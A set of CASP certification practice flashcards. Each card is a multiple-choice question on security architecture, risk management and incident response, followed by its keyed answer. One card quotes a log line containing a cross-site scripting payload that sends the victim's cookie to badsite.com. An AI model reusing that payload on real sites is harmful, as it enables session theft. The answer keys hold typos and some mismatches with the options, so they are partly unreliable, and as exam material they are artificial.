CyberSecurity

Description

CASP
Stephen Williamson
Flashcards by Stephen Williamson, updated more than 1 year ago
Stephen Williamson
Created by Stephen Williamson almost 7 years ago
1131
1

Resource summary

Question Answer
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this? A. Access control lists B. SELinux C. IPtables firewall D. HIPS SELinux
Company ABC's SAN is nearing capacity and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN? A. Enable multipath to increase availability B. Enable deduplication on the storage pools C. Implement snapshots to reduce virtual disk size D. Implement replication to offsite datacenter Enable deduplication on the storage pools
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem? A. Refuse LM and only accept NTLMv2 B. Accept only LM C. Refuse NTLMv2 and accept LM D. Accept only NTLM Refuse LM and only accept NTLMv2
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations? A. vTPM B. HSM C. TPM D. INE vTPM
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data? A. Encryption of each individual partition B. Encryption of the SSD at the file level C. FDE of each logical volume on the SSD D. FDE of the entire SSD as a single disk Encryption of each individual partition
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT); The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DD-YYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart's item? A. Input validation B. SQL injection C. TOCTOU D. Session hijacking TOCTOU
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses reduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur? A. The data may not be in a usable format B. The new storage array is not FCoE based C. The data may need a file system check D. The new storage array also only has a single controller The data may not be in a usable format
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim's privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue? A. Integer overflow B. Click-jacking C. Race condition D. SQL injection E. Use after free F. Input validation Use after free
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card detail. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input? A. Client side input validation B. Stored procedure C. Encrypting credit card details D. Regular expression matching Regular expression matching
A security administrator was doing a packet capture and noticed a system communicating which an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action? A. Investigate the network traffic and block UDP port 3544 at the firewall B. Remove the system from the network and disable IPv6 at the router C. Locate and remove the unauthorized 6to4 relay from the network D. Disable the switch port and block the 2001::/32 traffic at the firewall Investigate the network traffic and block UPD port 3544 at the firewall
A security administrator notices the following line in a server's security log: <input name='credentials'type='TEXT' value='"+request.getParameter('><script>document.location='http://badsite.com/?q='document.cookie</script>')+'", The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack? A. WAF B. Input validation C. SIEM D. Sandboxing E. DAM WAF
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable form real hardware. By implementing virtualized TPMs. which of the following trusted system concepts can be implemented? A. Software-based root of trust B. Continuous chain of trust C. Chain of trust with a hardware root of trust D. Software-based trust anchor with no root of trust Chain of trust with a hardware root of trust
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both data centers. Which of the following options increased data availability in the event of a datacenter failure? A. Replicate NAS changed to the tape backups at the other datacenter B. Ensure each server has two HBAs connected through two routes to the NAS C. Establish reduplication across divers storage paths D. Establish a SAN that replicates between data centers Establish a SAN that replicates between datacenters
An application present on the majority of an organization's 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue? A. Deploy custom HIPS signatures to detect and block the attacks B. Validate and deploy the appropriate patch C. Run the application in terminal services to reduce the threat landscape D. Deploy custom NIPS signatures to detect and block the attacks Validate and deploy the appropriate patch
select id, firstname, lastname from authors User input=firstname=Hack;man lastname=Johnson Which of the following types of attacks is the user attempting? A. XML injection B. Command injection C. Cross-site scripting D. SQL injection SQL injection
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important? A. Insecure direct object references, CSRF, Smurf B. Privilege escalation, Application DoS, Buffer overflow C. SQL injection, Resource exhaustion, Privilege escalation D. CSRF, Fault injection, Memory leaks Insecure direct object references, CSRF, Smurf
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement? A. SAN B. NAS C. Virtual SAN D. Virtual storage NAS
A 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? A. Add guests with more memory to increase capacity of the infrastructure B. A backup is running on the thin clients at 9am every morning C. Install more memory in the thin clients to handle the increased load while booting D. Booting all the lab desktops at the same time is creating excessive I/O E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity F. Install faster SSD drives in the storage system used in the infrastructure G. The lab desktop are saturating the network while booting H. The lab desktops are using more memory than is available to the host systems D. Booting all the lab desktops at the same time is creating excessive I/O F. Install faster SSD drives in the storage system used in the infrastructure
A security administrator is show the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 2013 Oct 10 07:14:57 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO): A. An authorized administrator has logged into the root account remotely B. The administrator should disable remote root logins C. Isolate the system immediately and begin forensic analysis on the host D. A remote attacker has compromised the root account using a buffer overflow in sshd E. A remote attacker has guessed the root password using a dictionary attack F. Use iptables to immediately DROP connections from the IP 198.51.100.23 G. A remote attacker has compromised the private key of the root account H. Change the root password immediately to a password not found in a dictionary C. Isolate the system immediately and begin forensic analysis on the host E. A remote attacker has guessed the root password using a dictionary attack
A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and had disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUSTS be implemented to minimize the risk of data leakage? (SELECT TWO): A. A full-system backup should be implemented to a third-party provider with strong encryption for data in transit B. A DLP gateway should be installed at the company border C. Strong authentication should be implemented via external biometric devices D. Full-tunnel VPN should be required for all network communication E. Full-drive file hashing should be implemented with hashes stored on separate storage F. Split-tunnel VPN should be enforced when transferring sensitive data B. A DLP gateway should be installed at the company border D. Full-tunnel VPN should be required for all network communication
The risk manager has requested a security solution that is centrally managed, can easily be updates, and protects end users workstations form both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement? A. HIPS B. UTM C. Antivirus D. NIPS E. NLP HIPS
Which of the following describes a risk and mitigation associated with cloud data storage? A. Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest B. Risk: Offsite replication Mitigation: Multi-site backups C. Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing D. Risk: Combined data archiving Mitigation: Two-factor administrator authentication Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest
An insurance company is looking to purchase a smaller company in another country. Which of the following tasks would the security administrator perform as part of the security due diligence? A. Review switch and router configurations B. Review the security policies and standards C. Perform a network penetration test D. Review the firewall rule set and IPS logs Review the security policies and standards
A new piece of ransomware got installed on a company's backup server which encrypted the hard drives containing the OS and backup application configuration but did not affect the reduplication data hard drives. During the incident response, the company finds that all backup tapes for this server are also corrupt. Which of the following is the PRIMARY concern? A. Determining how to install HIPS across all server platforms to prevent future incidents B. Preventing the ransomware from re-infecting the server upon restore C. Validating the integrity of the reduplicated data D. Restoring the data will be difficult without application configuration Restoring the data will be difficult without the application configuration
The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in another country. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are not implemented? A. Geographical regulation issues, loss of intellectual property and interoperability agreement issues B. Improper handling of client data, interoperability agreement issues and regulatory issues C. Cultural differences, increased cost of doing business and divestiture issues D. Improper handling of customer data, loss of intellectual property and reputation damage Improper handling of customer data, loss of intellectual property and reputation damage
A security analyst has been asked to develop a quantitative risk analysis and risk assessment for the company's online shopping application. Based on heuristic information from the Security Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5 times a year. The Business Operations department has determined the loss associated to each attack is $40,000. After implementing application caching, the number of DoS attacks was reduced to one time a year. The cost of the countermeasures was $100,000. Which of the following is the monetary value earned during the first year of operation? A. $60,000 B. $100,000 C. $140,000 D. $200,000 $60,000
The Information Security (ISO) is reviewing new policies that have been recently made effective and now apply to the company. Upon review, the ISO identifies a new requirement to implement two-factor authentication on the company's wireless system. Due to budget constraints, the company will be unable to implement the requirement for the next two years. The ISO is required to submit a policy exception form to the Chief Information Officer (CIO). Which of the following are MOST important to include when submitting the exception form? (Select THREE): A. Business or technical justification for not implementing the requirements B. Risks associated with the inability to implement the requirements C. Industry best practices with respect to the technical implementation of the current controls D. All sections of the policy that may justify non-implementation of the requirements E. A revised DRP and COOP plan to the exception form F. Internal procedures that may justify a budget submission to implement the new requirement G. Current and planned controls to mitigate the risks A. Business or technical justification for not implementing the requirements B. Risks associated with the inability to implement the requirements C. Current and planned controls to mitigate the risks
The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The documentation shows that a single 24 hours downtime in a critical business function has determined that there is a high probability that a threat will materialize based on historical data. The CIO's budget does not allow for full system hardware replacement in case of a catastrophic failure, note does it allow for the purchase of additional compensating controls. Which of the following should the CIO recommend to the finance director to minimize financial loss? A. The company should mitigate the risk B. The company should transfer the risk C. The company should avoid the risk D. The company should accept the risk The company should transfer the risk
A company is in the process of outsourcing its customer relationship management system to a cloud provider. It will host the entire organizationís customer database. The database will be accessed by both the companyís users and its customers. The procurement department has asked what security activities must be performed for the deal to proceed. Which of the following are the MOST appropriate security activities to be performed as part of due diligence? (Select TWO): A. Physical penetration test of the datacenter to ensure there are appropriate controls B. Penetration testing of the solution to ensure that the customer data is well protected C Security clauses are implemented into the contract such as the right to audit D. Review of the organizations security policies, procedures and relevant hosting certifications E. Code review of the solution to ensure that there are no back doors located in the software C. Security clauses are implemented into the contract such as the right to audit D. Review of the organization security policies and relevant hosting certifications
An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource Management (CRM) application. Which of the following ensures the organization mitigates the risk of managing separate user credentials? A. Ensure the SaaS provider supports dual factor authentication B. Ensure the SaaS provider supports encrypted password transmission and storage C. Ensure the SaaS provider support secure hash file exchange D. Ensure the SaaS provider supports role-based access control E. Ensure the SaaS provider support directory services federation Ensure the SaaS provider supports directory services federation
After a security incident, an administrator would like to implement policies that would help reduce fraud and the potential for collusion between employees. Which of the following would help meet these goals by having co-workers occasionally audit another worker's position? A. Least privilege B. Job rotation C. Mandatory vacation D. Separation of duties Job rotation
A large organization has recently suffered a massive credit card breach. During the months of Incident Response, there were multiple attempts to assign blame for whose fault it was that the incident occurred. In which part of the incident response phase would this be addressed in a controlled and productive manner? A. During the Identification Phase B. During the Lessons Learned phase C. During the Containment Phase D. During the Preparation Phase During the Lessons Learned Phase
A security manager for a service provider has approved two vendors for connections to the service provider backbone. One vendor will be providing authentication services for its payment card service, and the other vendor will be providing maintenance to the service provider infrastructure sites. Which of the following business agreements is MOST relevant to the vendors and service providerís relationship? A. Memorandum of Agreement B. Interconnection Security Agreement C. Non-Disclosure Agreement D. Operating Level Agreement Interconnection Security Agreement
A large enterprise acquires another company which uses antivirus from a different vendor. The CISO has requested that data feeds from the two different antivirus platforms be combined in a way that allows management to assess and rate the overall effectiveness of antivirus across the entire organization. Which of the following tools can BEST meet the CISOís requirement? A. GRC B. IPS C. CMDB D. Syslog-ng E. IDS GRC
Which of the following provides the BEST risk calculation methodology? A. Annual Loss Expectancy (ALE) x Value of Asset B. Potential Loss x Event Probability x Control Failure Probability C. Impact x Threat x Vulnerability D. Risk Likelihood x Annual Loss Expectancy (ALE) Potential Loss x Event Probability x Control Failure Probability
A security policy states that all applications on the network must have a password length of eight characters. There are three legacy applications on the network that cannot meet this policy. One system will be upgraded in six months, and two are not expected to be upgraded or removed from the network. Which of the following processes should be followed? A. Establish a risk matrix B. Inherit the risk for six months C. Provide a business justification to avoid the risk D. Provide a business justification for a risk exception Provide a business justification for a risk exception
The senior security administrator wants to redesign the company DMZ to minimize the risks associated with both external and internal threats. The DMZ design must support security in depth, change management and configuration processes, and support incident reconstruction. Which of the following designs BEST supports the given requirements? A. A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator B. A single firewall DMZ where each firewall interface is managed by a separate administrator and logging to the cloud C. A SaaS based firewall which logs to the company's local storage via SSL, and is managed by the change control team D. A virtualized firewall, where each virtual instance is managed by a separate administrator and logging to the same hardware A dual firewall DMZ with remote logging where each firewall is managed by a separate administrator
A large hospital has implemented BYOD to allow doctors and specialists the ability to access patient medical records on their tablets. The doctors and specialists access patient records over the hospitalís guest WiFi network which is isolated from the internal network with appropriate security controls. The patient records management system can be accessed from the guest network and requires two factor authentication. Using a remote desktop type interface, the doctors and specialists can interact with the hospitalís system. Cut and paste and printing functions are disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST concern? (Select TWO): A. Privacy could be compromised as patient records can be viewed in uncontrolled areas B. Device encryption has not been enabled and will result in a greater likelihood of data loss C. The guest WiFi may be exploited allowing non-authorized individuals access to confidential patient data D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes E. Remote wiping of device A. Privacy could be compromised as patient records can be viewed in uncontrolled areas D. Malware may be on BYOD devices which can extract data via key logging and screen scrapes
The Chief Information Security Officer (CISO) at a company knows that many users store business documents on public cloud-based storage, and realizes this is a risk to the company. In response, the CISO implements a mandatory training course in which all employees are instructed on the proper use of cloud-based storage. Which of the following risk strategies did the CISO implement? A. Avoid B. Accept C. Mitigate D. Transfer Mitigate
A forensic analyst receives a hard drive containing malware quarantined by the antivirus application. After creating an image and determining the directory location of the malware file, which of the following helps to determine when the system became infected? A. The malware file's modify, access, change time properties B. The timeline analysis of the file system C. The time stamp of the malware in the swap file D. The date/time stamp of the malware detection in the antivirus logs The timeline analysis of the file system
The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the Chief Security Officerís (CSO) request to harden the corporate networkís perimeter. The CEO argues that the company cannot protect its employees at home, so the risk at work is no different. Which of the following BEST explains why this company should proceed with protecting its corporate network boundary? A. The corporate network is the only network that is audited by regulators and customers B. The aggregation of employees on a corporate network makes it a more valuable target for attackers C. Home networks are unknown to attackers and less likely to be targeted directly D. Employees are more likely to be using personal computers for general web browsing when they are at home The aggregation of employees on a corporate network makes it a more valuable target for attackers
A security officer is leading a lessons learned meeting. Which of the following should be components of that meeting? (Select TWO): A. Demonstration of IPS system B. Review vendor selection process C. Calculate the ALE for the event D. Discussion of event timeline E. Assigning of follow up items Discussion of event timeline Assigning of follow up items
An assessor identifies automated methods for identifying security control compliance through validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy continuous monitoring of authorized information systems? A. Independent verification and validation B. Security test and evaluation C. Risk assessment D. Ongoing authorization Ongoing authorization
The source workstation image for new accounting PCs has begun blue-screening. A technician notices that the date/time stamp of the image source appears to have changed. The desktop support director has asked the Information Security department to determine if any changes were made to the source image. Which of the following methods would BEST help with this process? (Select TWO): A. Retrieve source system image from backup and run file comparison analysis on the two images B. Parse all images to determine if extra data is hidden using steganography C. Calculate a new hash and compare it with the previously captured image hash D. Ask desktop support if any changes to the images were made E. Check key system files to see if date/time stamp is in the past six months Retrieve source system image from backup and run file comparison analysis on the two images Calculate a new hash and compare it with the previously captured image hash
A software project manager has been provided with a requirement from the customer to place limits on the types of transactions a given user can initiate without external interaction from another user with elevated privileges. This requirement is BEST described as an implementation of: A. an administrative control B. dual control C. separation of duties D. least privilege E. collusion separation of duties
The technology steering committee is struggling with increased requirements stemming from an increase in telecommuting. The organization has not addressed telecommuting in the past. The implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from remote locations with corporate assets. Which of the following steps must the committee take FIRST to outline senior managementís directives? A. Develop an information classification scheme that will properly secure data on corporate systems B. Implement database views and constrained interfaces so remote users will be unable to access PII from personal equipment C. Publish a policy that addresses the security requirements for working remotely with company equipment D. Work with mid-level managers to identify and document the proper procedures for telecommuting Publish a policy that addresses the security requirements for working remotely with company equipment
A company is facing penalties for failing to effectively comply with e-discovery requests. Which of the following could reduce the overall risk to the company from this issue? A. Establish a policy that only allow filesystem encryption and disallows the use of individual file encryption B. Require each user to log passwords used for file encryption to a decentralized repository C. Permit users to only encrypt individual files using their domain password and archive all old user passwords D. Allow encryption only by tools that use public keys from the existing escrowed corporate PKI Allow encryption only by tools that use public keys from the existing escrowed corporate PKI
There have been some failures of the company's internal facing website. A security engineer has found the WAF to be the root cause of the failures. System logs show that the WAF has been unavailable for 14 hours over the past month, in four separate situations. One of these situations was a two hour scheduled maintenance time, aimed at improving the stability of the WAF. Using the MTTR based on the last month's performance figures, which of the following calculations is the percentage of uptime assuming there were 722 hours in the month? A. 92.24 percent B. 98.06 percent C. 98.34 percent D. 99.72 percent 98.34 percent
A security firm is writing a response to an RFP from a customer that is building a new network based software product. The firmís expertise is in penetration testing corporate networks. The RFP explicitly calls for all possible behaviors of the product to be tested, however, it does not specify any particular method to achieve this goal. Which of the following should be used to ensure the security and functionality of the product? (Select TWO): A. Code review B. Penetration testing C. Grey box testing D. Code signing E. White box testing Code review White box testing
Company XYZ has purchased and is now deploying a new HTML5 application. The company wants to hire a penetration tester to evaluate the security of the client and server components of the proprietary web application before launch. Which of the following is the penetration tester MOST likely to use while performing black box testing of the security of the companyís purchased application? (Select TWO). A. Code review B. Sandbox C. Local proxy D. Fuzzer E. Port scanner Local proxy Fuzzer
The Information Security Officer (ISO) believes that the company has been targeted by cybercriminals and it is under a cyber attack. Internal services that are normally available to the public via the Internet are inaccessible, and employees in the office are unable to browse the Internet. The senior security engineer starts by reviewing the bandwidth at the border router, and notices that the incoming bandwidth on the routerís external interface is maxed out. The security engineer then inspects the following piece of log to try and determine the reason for the downtime, focusing on the companyís external routerís IP which is 128.20.176.19:11:16:22.110343 IP 90.237.31.27.19 > 128.20.176.19.19: UDP, length 140011:16:22.110351 IP 23.27.112.200.19 > 128.20.176.19.19: UDP, length 140011:16:22.110358 IP 192.200.132.213.19 > 128.20.176.19.19: UDP, length 1400 Which of the following describes the findings the senior security engineer should report to the ISO and the BEST solution for service restoration? After the senior engineer used a network analyzer to identify an active Fraggle attack, the company's ISP should be contacted and instructed to block the malicious packets
An external penetration tester compromised one of the client organizationís authentication servers and retrieved the password database. Which of the following methods allows the penetration tester to MOST efficiently use any obtained administrative credentials on the client organizationís other systems, without impacting the integrity of any of the systems? A. Use the pass the hash technique B. Use rainbow tables to crack the passwords C. Use the existing access to change the password D. Use social engineering to obtain the actual password Use the pass the hash technique
A web services company is planning a one-time high-profile event to be hosted on the corporate website. An outage, due to an attack, would be publicly embarrassing, so Joe, the Chief Executive Officer (CEO), has requested that his security engineers put temporary preventive controls in place. Which of the following would MOST appropriately address Joe's concerns? A. Ensure web services hosting event use TCP cookies and deny_hosts B. Configure an intrusion prevention system that blocks IPs after detecting too many incomplete sessions C. Contract and configure scrubbing services with third-party DDoS mitigation providers D. Purchase additional bandwidth from the company's Internet service provider Contract and configure scrubbing services with third-party DDoS mitigation providers
The Chief Executive Officer (CEO) of an Internet service provider (ISP) has decided to limit the companyís contribution to worldwide Distributed Denial of Service (DDoS) attacks. Which of the following should the ISP implement? (Select TWO). A. Block traffic from the ISP's networks destined for blacklisted IPs B. Prevent the ISP's customers from querying DNS servers other than those hosted by the ISP C. Scan the ISP's customer networks using an up-to-date vulnerability scanner D. Notify customers when services they run are involved in an attack E. Block traffic with an IP source not allocated to customers from exiting the ISP's network Notify customers when services they run are involved in an attack Block traffic with an IP source not allocated to customers from exiting the ISP's network
Due to compliance regulations, a company requires a yearly penetration test. The Chief Information Security Officer (CISO) has asked that it be done under a black box methodology.Which of the following would be the advantage of conducting this kind of penetration test? A. The risk unplanned server outages is reduced B. Using documentation provided to them, the pen-test organization can quickly determine areas to focus on C. The results will show an in-depth view of the network and should help pin-point areas of internal weakness D. The result should reflect what attackers may be able to learn about the company The results should reflect what attackers may be able to learn about the company
Ann, a systems engineer, is working to identify an unknown node on the corporate network. To begin her investigative work, she runs the following nmap command string:user@hostname:~$ sudo nmap ñO 192.168.1.54Based on the output, nmap is unable to identify the OS running on the node, but the following ports are open on the device:TCP/22TCP/111TCP/512-514TCP/2049TCP/32778 Based on this information, which of the following operating systems is MOST likely running on the unknown node? A. Linux B. Windows C. Solaris D. OSX Solaris
A security engineer is responsible for monitoring company applications for known vulnerabilities. Which of the following is a way to stay current on exploits and information security news? A. Update company policies and procedures B. Subscribe to security mailing lists C. Implement security awareness training D. Ensure that the organization vulnerability management plan is up-to-date Subscribe to security mailing lists
The Chief Executive Officer (CEO) of a small start-up company wants to set up offices around the country for the sales staff to generate business. The company needs an effective communication solution to remain in constant contact with each other, while maintaining a secure business environment. A junior-level administrator suggests that the company and the sales staff stay connected via free social media. Which of the following decisions is BEST for the CEO to make? A. Social media is an effective solution because it is easily adaptable to new situations B. Social media is an ineffective solution because the policy may not align with business C. Social media is an effective solution because it implements SSL encryption D. Social media is an ineffective solution because it is not primarily intended for business applications Social media is an ineffective solution because the policy may not align with the business
News outlets are beginning to report on a number of retail establishments that are experiencing payment card data breaches. The data exfiltration is enabled by malware on a compromised computer. After the initial exploit, network mapping and fingerprinting is conducted to prepare for further exploitation. Which of the following is the MOST effective solution to protect against unrecognized malware infections? A. Remove local admin permissions from all users and change anti-virus to a cloud aware, push technology B. Implement an application whitelist at all levels of the organization C. Deploy a network based heuristic IDS, configure all layer 3 switches to feed data to the IDS for more effective monitoring D. Update router configuration to pass all network traffic through a new proxy server with advanced malware detection Implement an application whitelist at all levels of the organization
A security administrator notices a recent increase in workstations becoming compromised by malware. Often, the malware is delivered via drive-by downloads, from malware hosting websites, and is not being detected by the corporate antivirus. Which of the following solutions would provide the BEST protection for the company? A. Increase the frequency of antivirus downloads and install updates to all workstations B. Deploy a cloud-based content filter and enable the appropriate category to prevent further infections C. Deploy a WAF to inspect and block all web traffic which may contain malware and exploits D. Deploy a web based gateway antivirus server to intercept viruses before they enter the network Deploy a cloud-based content filter and enable the appropriate category to prevent further infections
A security administrator wants to calculate the ROI of a security design which includes the purchase of new equipment. The equipment costs $50,000 and it will take 50 hours to install and configure the equipment. The administrator plans to hire a contractor at a rate of $100/hour to do the installation. Given that the new design and equipment will allow the company to increase revenue and make an additional $100,000 on the first year, which of the following is the ROI expressed as a percentage for the first year? A. -45 percent B. 5.5 percent C. 45 percent D. 82 percent 82 percent
A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it was determined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant effect on overall availability. Which of the following would be the FIRST process to perform as a result of these findings? Review to determine if control effectiveness is in line with the complexity of the solution. Determine if the requirements can be met with a simpler solution
65 A Chief Financial Officer (CFO) has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, but corporate assets are still found to be vulnerable. The business recently funded a patch management product and SOE hardening initiative. A third party auditor reported findings against the business because some systems were missing patches. Which of the following statements BEST describes this situation? Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly
The Information Security Officer (ISO) is reviewing a summary of the findings from the last COOP tabletop exercise. The Chief Information Officer (CIO) wants to determine which additional controls must be implemented to reduce the risk of an extended customer service outage due to the VoIP system being unavailable. Which of the following BEST describes the scenario presented and the document the ISO is reviewing? The ISO is assessing the effect of a simulated downtime involving the telecommunication system within the AAR
Which of the following activities is commonly deemed 'OUT OF SCOPE' when undertaking a penetration test? Undertaking network-based denial of service attacks in production environment
A company is in the process of implementing a new front end user interface for its customers, the goal is to provide them with more self service functionality. The application has been written by developers over the last six months and the project is currently in the test phase.Which of the following security activities should be implemented as part of the SDL in order to provide the MOST security coverage over the solution? (Select TWO). Perform grey box penetration testing over the solution Perform static code review over the front end source code
A new web based application has been developed and deployed in production. A security engineer decides to use an HTTP interceptor for testing the application. Which of the following problems would MOST likely be uncovered by this tool? The tool could show that input validation was only enabled on the client side
A security consultant is conducting a network assessment and wishes to discover any legacy backup Internet connections the network may have. Where would the consultant find this information and why would it be valuable? This information can be found in global routing tables, and is valuable because backup connections typically do not have perimeter protection as strong as the primary connection
A network administrator with a companyís NSP has received a CERT alert for targeted adversarial behavior at the company. In addition to the companyís physical security, which of the following can the network administrator use to detect the presence of a malicious actor physically accessing the companyís network or information systems from within? (Select TWO). A. RAS B. Vulnerability scanner C. HTTP intercept D. HIDS E. Port scanner F. Protocol analyzer HIDS Protocol analyzer
he security engineer receives an incident ticket from the helpdesk stating that DNS lookup requests are no longer working from the office. The network team has ensured that Layer 2 and Layer 3 connectivity are working. Which of the following tools would a security engineer use to make sure the DNS server is listening on port 53? A. PING B. NESSUS C. NSLOOKUP D.NMAP NMAP
A human resources manager at a software development company has been tasked with recruiting personnel for a new cyber defense division in the company. This division will require personnel to have high technology skills and industry certifications. Which of the following is the BEST method for this manager to gain insight into this industry to execute the task? Attend conferences, webinars, and training to remain current with the industry and job requirements
The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISO is concerned that an unrecognized threat could compromise corporate data and result in regulatory fines as well as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which of the following equipment MUST be deployed to guard against unknown threats? Behavior based IPS with a communication link to a cloud based vulnerability and threat feed
A small companyís Chief Executive Officer (CEO) has asked its Chief Security Officer (CSO) to improve the companyís security posture quickly with regard to targeted attacks. Which of the following should the CSO conduct FIRST? A. Survey threat feeds from services inside the same industry B. Purchase multiple threat feeds to ensure diversity and implement blocks for malicious traffic C. Conduct an internal audit against industry best practices to perform a qualitative analysis D. Deploy a UTM solution that receives frequent updates from a trusted industry vendor Survey threat feeds from services inside the same industry
A security engineer is working on a large software development project. As part of the design of the project, various stakeholder requirements were gathered and decomposed to an implementable and testable level. Various security requirements were also documented. Organize the following security requirements into the correct hierarchy required for an SRTM.Requirement 1: The system shall provide confidentiality for data in transit and data at rest.Requirement 2: The system shall use SSL, SSH, or SCP for all data transport.Requirement 3: The system shall implement a file-level encryption scheme.Requirement 4: The system shall provide integrity for all data at rest.Requirement 5: The system shall perform CRC checks on all files. Level1: Requirements 1 and 4; Level 2: Requirements 2 and 3 under 1, Requirement 5 under 4
A mature organization with legacy information systems has incorporated numerous new processes and dependencies to manage security as its networks and infrastructure are modernized. The Chief Information Office has become increasingly frustrated with frequent releases, stating that the organization needs everything to work completely, and the vendor should already have those desires built into the software product. The vendor has been in constant communication with personnel and groups within the organization to understand its business process and capture new software requirements from users. Which of the following methods of software development is this organization's configuration management process using? A. Agile B. SDL C. Waterfall D. Joint application development Agile
A security engineer is a new member to a configuration board at the request of management. The company has two new major IT projects starting this year and wants to plan security into the application deployment. The board is primarily concerned with the applicationsí compliance with federal assessment and authorization standards. The security engineer asks for a timeline to determine when a security assessment of both applications should occur and does not attend subsequent configuration board meetings. If the security engineer is only going to perform a security assessment, which of the following steps in system authorization has the security engineer omitted? A. Establish the security control baseline B. Build the application according to software development security standards C. Review the results of user acceptance testing D. Consult with the stakeholders to determine which standards can be omitted Establish the security control baseline
An analyst connects to a company web conference hosted on www.webconference.com/meetingID#01234 and observes that numerous guests have been allowed to join, without providing identifying information. The topics covered during the web conference are considered proprietary to the company. Which of the following security concerns does the analyst present to management? Unauthenticated users could present a risk to the confidentiality of the company's information
During a recent audit of servers, a company discovered that a network administrator, who required remote access, had deployed an unauthorized remote access application that communicated over common ports already allowed through the firewall. A network scan showed that this remote access application had already been installed on one third of the servers in the company. Which of the following is the MOST appropriate action that the company should take to provide a more appropriate solution? Implement SSL VPN with SAML standards for federation
A small retail company recently deployed a new point of sale (POS) system to all 67 stores. The core of the POS is an extranet site, accessible only from retail stores and the corporate office over a split-tunnel VPN. An additional split-tunnel VPN provides bi-directional connectivity back to the main office, which provides voice connectivity for store VoIP phones. Each store offers guest wireless functionality, as well as employee wireless. Only the staff wireless network has access to the POS VPN. Recently, stores are reporting poor response times when accessing the POS application from store computers as well as degraded voice quality when making phone calls. Upon investigation, it is determined that three store PCs are hosting malware, which is generating excessive network traffic. After malware removal, the information security department is asked to review the configuration and suggest changes to prevent this from happening again. Which of the following denotes the BEST way to mitigate future malware risk? Deploy new perimeter firewalls at all stores with UTM functionality
